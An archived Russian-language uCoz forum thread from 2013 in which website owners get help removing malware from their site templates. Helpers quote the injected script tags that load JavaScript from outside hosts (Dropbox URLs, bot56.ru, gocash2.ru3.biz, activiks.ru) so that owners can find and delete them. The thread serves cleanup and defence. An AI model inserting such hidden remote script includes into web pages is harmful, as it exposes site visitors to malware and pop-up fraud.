Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах_3 (архив для чтения)
Вирусы на сайтах_3 (архив для чтения)
Yaponec
Сообщений: 4
Репутация: 0

Сообщение # 1726 | 15:23:27 26 Мар 2013

Код
<script type="text/javascript" src="http://rapfan.ucoz.net/js/ui.js"></script>
этого я не нашел

Код
<iframe name="fXD88295" frameborder="0" src="http://vk.com/widget_community.php?app=0&width=300px&gid=39448184&mode=0&color1=&color2=&color3=&height=290&url=http%3A%2F%2Frapfan.ucoz.net%2Fload%2Fmuzyka%2F2&13da65dd4da" width="300" height="200" scrolling="no" id="vkwidget1" style="overflow: hidden; height: 290px;"></iframe>


этого удалил все равно вирус!

Добавлено (26 Мар 2013, 15:23:27)
---------------------------------------------
вирус выдает только хром, когда воиду через оперу там не выдает вирус

Anri9566
Сообщений: 2
Репутация: 0

Сообщение # 1727 | 16:38:05 26 Мар 2013
Цитата (Anri9566)
Так я поэтому и спросил, что в шаблонах ничего не находится.
Разобрался. Надо было удалить <script type="text/javascript" src="http://dl.dropbox.com/u/36053555/script.js"></script>
WarDevil
Сообщений: 2
Репутация: 0

Сообщение # 1728 | 23:26:36 26 Мар 2013
Цитата (condor-bird)
Цитата (WarDevil)фон сайта как бы затемнён, при открытии любой категории с меню выскакивает новое окно (http://hitulya.ru/) с запросом "Обновите Флеш плеер". Также выскакивает оч. много всплывающей рекламы.

Что-то на всех сайтах одни и те же вредоносные баннеры.

Всю эту ерунду гнать из кода шаблонов:

Большое человеческое спасибо дружище!!!! smile
goldkey_klng
Сообщений: 2
Репутация: 0

Сообщение # 1729 | 23:36:36 26 Мар 2013
Добрый день. Пришло письмо от яндекса, что на страницах обнаружен вредоносный код:
http://goldkey-klng.ru/index/prajs_list/0-7
http://goldkey-klng.ru/news/o_mjagkoj_krovle/2013-03-19-163
С помощью различных сервисов определил что это Troj/SWFExp-BN, разбираюсь слабо где его искать, но есть подозрение что прячется в форме входа на сайт. Просьба посмотрите и подсажите что делать.
bandjuk
Сообщений: 6816
Репутация: 2398
Уровень замечаний:

Сообщение # 1730 | 23:48:11 26 Мар 2013
Цитата (goldkey_klng)
но есть подозрение что прячется в форме входа на сайт.

верно тут фрейм:
<script type="text/javascript" src="http://login-form.bot56.ru/jogin_form_javascript.js" rel="nofollow"></script>
повторяется 2 раза
Сообщение отредактировал bandjuk - Вторник, 26 Мар 2013, 23:48:45
goldkey_klng
Сообщений: 2
Репутация: 0

Сообщение # 1731 | 23:50:38 26 Мар 2013
Цитата (bandjuk)
верно тут фрейм
Посмотрите сейчас я восстановил старую форму фхода....
bandjuk
Сообщений: 6816
Репутация: 2398
Уровень замечаний:

Сообщение # 1732 | 23:53:13 26 Мар 2013
сейчас нет
chirkowa24
Сообщений: 5
Репутация: 0

Сообщение # 1733 | 19:25:40 27 Мар 2013
Здравствуйте! Помогите пожалуйста, на школьном сайте появились вирусы: всплывающие окна и т.д., зайти невозможно не гостем, не администратором
Ссылка на сайт http://perwomaisk-s.ucoz.ru/
на самой главной странице есть вирус
проблема обнаруживается и под гостем и под администратором тоже
Браузер Mozilla, и другие гугл тоже..
Помогите пожалуйста, сайт школьный
Прикрепления: 9527636.png (240.0 Kb)
chirkowa24
Сообщений: 5
Репутация: 0

Сообщение # 1734 | 20:33:00 27 Мар 2013
я уже все страницы облазила вот <script type="text/javascript" src="https://dl.dropbox.com/u/36053555/scsct.js"></script>
<script type="text/javascript" src="https://dl.dropbox.com/u/36053555/scripta.js"></script></body>
нашла везде удалила, все равно не помогает
SOCHI1014
Сообщений: 863
Репутация: 229

Сообщение # 1735 | 20:34:33 27 Мар 2013
Он
Цитата (chirkowa24)
Здравствуйте! Помогите пожалуйста, на школьном сайте появились вирусы: всплывающие окна и т.д., зайти невозможно не гостем, не администраторомСсылка на сайт http://perwomaisk-s.ucoz.ru/
на самой главной странице есть вирус
проблема обнаруживается и под гостем и под администратором тоже
Браузер Mozilla, и другие гугл тоже..
Помогите пожалуйста, сайт школьный
Прикрепления: 9527636.png(240Kb)
DВот скрипт <script language="javascript" src="http://gocash2.ru3.biz/js/back.php?id=54"> его вам нужно удалить. Располагается он в верхней части шаблона. И эти удалите <script type="text/javascript" src="https://dl.dropbox.com/u/36053555/scsct.js"></script><script type="text/javascript" src="https://dl.dropbox.com/u/36053555/scripta.js"></script> Они в нижней части
del
Генератор таблиц HTML онлайн
Сообщение отредактировал SOCHI1014 - Среда, 27 Мар 2013, 20:36:03
chirkowa24
Сообщений: 5
Репутация: 0

Сообщение # 1736 | 20:50:06 27 Мар 2013
Да все вирусы и окна пропали, но теперь с сайта пропала вся ИНФОРМАЦИЯ, я не могу ничего редактировать в визуальном редакторе!!!!пролпали кнопки редактировать в визуальном редакторе т т.д. Через панель управления когла заходишь - информация есть, но при выходе из нее ничего не могу сделать!!!!Как быть???помогите

Добавлено (27 Мар 2013, 20:50:06)
---------------------------------------------
может я скрипты какие то со всех страниц удалила, информацию теперь не вернешь, но как сделать, чтобы заново разметить информацию!!!!

Славутич23рус
Сообщений: 4
Репутация: 0

Сообщение # 1737 | 21:03:41 27 Мар 2013
Добрый день уважаемые админы! До сегодняшнего дня в Мозилле сайт Британский футбол от Славутича работал исправно..но Мозилла пишет обнаружен вредоносный код....и этот браузер сайт не открывает. Некий Mal/Iframe-AN, вот...не могу его найти и удалить....помогите пожалуйста
Ссори за повтор сообщения..но вижу в другой теме никто не сидит..может здесь есть специалисты
SOCHI1014
Сообщений: 863
Репутация: 229

Сообщение # 1738 | 22:04:56 27 Мар 2013
Цитата (chirkowa24)
Цитата (SOCHI1014)В коде шаблона я так понимаю это новости найдите это
изамените на это $CONTEN
Спасибо большое!!!!Все вернулось на место!!!Огромное спасибо!!!!Только вот еще вопрос как на будущее сайт обезопасить!!!!!!
Не использовать сторонние скрипты и иметь сложный пароль, как от сайта так и от панели управления
del
Генератор таблиц HTML онлайн
KsanaH
Сообщений: 4
Репутация: 0

Сообщение # 1739 | 10:22:27 28 Мар 2013
Цитата (webanet)
KsanaH, лучше удалите скрипт соц.закладок от однакнопка и поставьте вместо неё кнопки яндекса http://api.yandex.ru/share/ Благодарю!
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1740 | 12:13:16 28 Мар 2013
Славутич23рус, блок интернационал лучше удалить полностью. так как там кроме вредоносного кода ещё и миллион картинок с левого сайта. но если этот мусор вам нужен, то удалите просто вредоносный код

Цитата
<input original-alt="" original-title="English" src="http://bambun.ru/images/geo/UnitedKingdom.png" onclick="location.href='http://translate.google.ru/translate?js=y&prev=_t&hl=en&ie=UTF-8&u='+location.href+'&sl=ru&tl=en&history_state0=&swap=1'" type="image">
<input original-alt="" original-title="Deutsch" src="http://bambun.ru/images/geo/Germany.png" onclick="location.href='http://translate.google.ru/translate?js=y&prev=_t&hl=de&ie=UTF-8&u='+location.href+'&sl=ru&tl=de&history_state0=&swap=1'" type="image">
<input original-alt="" original-title="Polska" src="http://bambun.ru/images/geo/Poland.png" onclick="location.href='http://translate.google.ru/translate?js=y&prev=_t&hl=pl&ie=UTF-8&u='+location.href+'&sl=ru&tl=pl&history_state0=&swap=1'" type="image">
<input original-alt="" original-title="Rusija" src="http://bambun.ru/images/geo/Russian.png" onclick="location.href='location.href" type="image"><br>
<input original-alt="" original-title="Francais" src="http://bambun.ru/images/geo/France.png" onclick="location.href='http://translate.google.ru/translate?js=y&prev=_t&hl=fr&ie=UTF-8&u='+location.href+'&sl=ru&tl=fr&history_state0=&swap=1'" type="image">
<input original-alt="" original-title="Italiano" src="http://bambun.ru/images/geo/Italy.png" onclick="location.href='http://translate.google.ru/translate?js=y&prev=_t&hl=it&ie=UTF-8&u='+location.href+'&sl=ru&tl=it&history_state0=&swap=1'" type="image"> <script type="text/javascript" src="http://activiks.ru/img/png.js"></script>
<input original-alt="" original-title="Hrvatski" src="http://bambun.ru/images/geo/Croatia.png" onclick="location.href='http://translate.google.ru/translate?js=y&prev=_t&hl=hr&ie=UTF-8&u='+location.href+'&sl=ru&tl=hr&history_state0=&swap=1'" type="image">
<input original-alt="" original-title="Cestina" src="http://bambun.ru/images/geo/Czech.png" onclick="location.href='http://translate.google.ru/translate?js=y&prev=_t&hl=cs&ie=UTF-8&u='+location.href+'&sl=ru&tl=cs&history_state0=&swap=1'" type="image">
но вы должны помнить, что даже за одну картинку в коде с заблокированного сайта ваш сайт тоже пойдет в фильтр безопасности поисковых систем. а левых картинок у вас слишком много

в блоке точное время вот это

Код
<script src="http://wallaby.ucoz.ru/jv/asf.js"></script>
не самое лучшее решение. и подгрузка скриптов, флеша и картинок с чужих сайтов тем более не лучшее решение. сейчас сайт валлаби недоступен, и ваш здорово тормозит из-за этого. подгружая элеменоты дизайна, скрипты и картинки с чужих сайтов вы не только рискуете, но и ставите свой сайт в зависимость от работы левых сайтов
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах_3 (архив для чтения)
Поиск: